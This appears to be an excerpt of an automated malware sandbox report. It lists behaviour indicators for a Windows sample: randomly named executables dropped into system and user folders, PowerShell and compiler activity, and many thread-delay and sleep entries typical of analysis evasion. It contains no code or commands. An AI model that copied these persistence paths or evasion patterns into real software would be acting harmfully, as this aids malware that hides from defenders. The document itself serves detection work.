                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 594123
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 594014
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593904
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593785
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593632
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593508
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593405
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 300000
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593296
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593187
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593077
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592968
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592852
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592749
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592635
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592514
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592405
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592296
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592184
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 591981
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 591531
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 591339
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 591234
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2483Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2293Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2122
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2314
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3804
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2126
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWindow / User API: threadDelayed 9156
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeDropped PE file which has not been started: C:\Users\user\Desktop\izhrsOEp.logJump to dropped file
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeDropped PE file which has not been started: C:\Users\user\Desktop\WWLLRmVS.logJump to dropped file
                                    Source: C:\hyperContaineragent\Bridgecommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\tYJQSSrA.logJump to dropped file
                                    Source: C:\hyperContaineragent\Bridgecommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEEoXuLc.logJump to dropped file
                                    Source: C:\hyperContaineragent\Bridgecommon.exe TID: 7656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep count: 2483 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep count: 2293 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580Thread sleep count: 2122 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8116Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1804Thread sleep count: 2314 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1228Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep count: 3804 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep count: 2126 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\hyperContaineragent\Bridgecommon.exe TID: 4908Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\hyperContaineragent\Bridgecommon.exe TID: 1244Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6184Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe TID: 8068Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 7692Thread sleep time: -30000s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -31359464925306218s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -600000s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -599868s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -599734s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -599625s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -599484s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -599304s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -599178s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -599000s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -598844s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6208Thread sleep time: -10800000s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -598609s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -598426s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -598297s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -598185s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -598077s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -597968s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -597858s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -597749s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -597639s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -597515s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -597297s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -597109s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596844s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596701s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596593s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596483s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596369s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596240s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596125s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596014s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595905s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595796s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595685s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595576s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595468s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595359s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595249s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595140s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595014s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -594844s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -594656s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -594261s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -594123s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -594014s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593904s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593785s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593632s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593508s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593405s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6208Thread sleep time: -300000s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593296s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593187s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593077s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592968s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592852s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592749s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592635s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592514s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592405s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592296s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592184s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -591981s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -591531s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -591339s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -591234s >= -30000s
                                    Source: C:\Windows\System32\svchost.exe TID: 6572Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe TID: 7828Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\hyperContaineragent\Bridgecommon.exe TID: 7148Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe TID: 5052Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\hyperContaineragent\Bridgecommon.exe TID: 7944Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe TID: 7624Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\hyperContaineragent\Bridgecommon.exe TID: 6072Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CAA69B
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CBC220
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBE6A3 VirtualQuery,GetSystemInfo,0_2_00CBE6A3
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 30000
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 600000
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599868
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599734
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599625
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599484
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599304
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599178
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599000
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598844
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 3600000
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598609
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598426
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598297
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598185
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598077
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597968
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597858
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597749
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597639
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597515
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597297
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597109
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596844
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596701
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596593
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596483
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596369
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596240
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596125
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596014
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595905
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595796
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595685
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595576
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595468
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595359
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595249
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595140
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595014
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 594844
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 594656
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 594261
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 594123
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 594014
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593904
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593785
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593632
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593508
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593405
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 300000
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593296
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593187
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593077
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592968
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592852
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592749
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592635
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592514
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592405
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592296
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592184
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 591981
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 591531
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 591339
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 591234
